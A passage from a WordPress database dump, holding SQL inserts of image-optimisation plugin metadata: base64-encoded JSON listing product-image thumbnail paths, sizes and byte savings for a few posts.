Dd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzA2NCwiaWQiOjEzNTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTUyLU5FVy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNTItTkVXLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy01Mi1ORVctMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzMwNjYsImlkIjoxMzUxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi1ORVctNDAweDMyMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTUyLU5FVy00MDB4MzIwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiMzIwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNTItTkVXLTQwMHgzMjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMDY4LCJpZCI6MTM1MX1d'); 
INSERT INTO `wp_postmeta` VALUES (29603, 1350, 'wpfc_optimisation_reduction', '34794'); 
INSERT INTO `wp_postmeta` VALUES (29604, 1350, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVzIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXMi5qcGciLCJ3aWR0aCI6NDM2LCJoZWlnaHQiOjMyMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVcyLmpwZyIsInJlZHVjdGlvbiI6MzQxNTQsInRpbWUiOjE0ODM1NzMwNzUsImlkIjoiMTM1MCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVzItMzQweDMyMC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjMyMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXMi0zNDB4MzIwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVcyLTM0MHgzMjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMDc3LCJpZCI6MTM1MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXMi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVcyLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVzItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzMwNzksImlkIjoxMzUwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVcyLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVzItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXMi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzA4MSwiaWQiOjEzNTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVzItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXMi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVcyLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMDg0LCJpZCI6MTM1MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVcyLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVzItMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXMi0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MjQ5LCJ0aW1lIjoxNDgzNTczMDg2LCJpZCI6MTM1MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVcyLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVzItMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXMi0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MjYxLCJ0aW1lIjoxNDgzNTczMDg4LCJpZCI6MTM1MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVcyLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVzItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXMi0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MTIzLCJ0aW1lIjoxNDgzNTczMDkwLCJpZCI6MTM1MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVcyLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVzItMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXMi0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzA5MiwiaWQiOjEzNTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXMi0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVcyLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVzItMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzMwOTQsImlkIjoxMzUwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVzItNDAweDMyMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXMi00MDB4MzIwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiMzIwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVcyLTQwMHgzMjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMDk2LCJpZCI6MTM1MH1d'); 
INSERT INTO `wp_postmeta` VALUES (29605, 1348, 'wpfc_optimisation_reduction', '22999'); 
INSERT INTO `wp_postmeta` VALUES (29606, 1348, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVcuanBnIiwid2lkdGgiOjQzNiwiaGVpZ2h0IjozMjAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXLmpwZyIsInJlZHVjdGlvbiI6MjI0NjQsInRpbWUiOjE0ODM1NzMxMDQsImlkIjoiMTM0OCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVy0zNDB4MzIwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzIwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVctMzQweDMyMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXLTM0MHgzMjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMTA2LCJpZCI6MTM0OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzMxMDgsImlkIjoxMzQ4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVctMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzExMSwiaWQiOjEzNDh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVctMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMTEzLCJpZCI6MTM0OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVctMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVy0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MTY0LCJ0aW1lIjoxNDgzNTczMTE1LCJpZCI6MTM0OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVctMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVy0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MjU4LCJ0aW1lIjoxNDgzNTczMTE3LCJpZCI6MTM0OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVctMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVy0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MTA2LCJ0aW1lIjoxNDgzNTczMTE5LCJpZCI6MTM0OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVctMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzEyMSwiaWQiOjEzNDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVy0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVctMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzMxMjQsImlkIjoxMzQ4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLU5FVy00MDB4MzIwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi1ORVctNDAweDMyMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjMyMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tTkVXLTQwMHgzMjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMTI2LCJpZCI6MTM0OH1d'); 
INSERT INTO `wp_postmeta` VALUES (29607, 1347, 'wpfc_optimisation_reduction', '21938'); 
INSERT INTO `wp_postmeta` VALUES (29608, 1347, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXN1cHJpb24uanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc3Vwcmlvbi5qcGciLCJ3aWR0aCI6NDc4NCwiaGVpZ2h0Ijo0Nzg0LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTczMTMwLCJpZCI6IjEzNDcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zdXByaW9uLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXN1cHJpb24tMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9vcHRlb24tc3Vwcmlvbi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NjgyLCJ0aW1lIjoxNDgzNTczMTM0LCJpZCI6MTM0N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc3Vwcmlvbi04MDB4ODAwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6ODAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zdXByaW9uLTgwMHg4MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvb3B0ZW9uLXN1cHJpb24tODAweDgwMC5qcGciLCJyZWR1Y3Rpb24iOjI1ODksInRpbWUiOjE0ODM1NzMxMzgsImlkIjoxMzQ3fS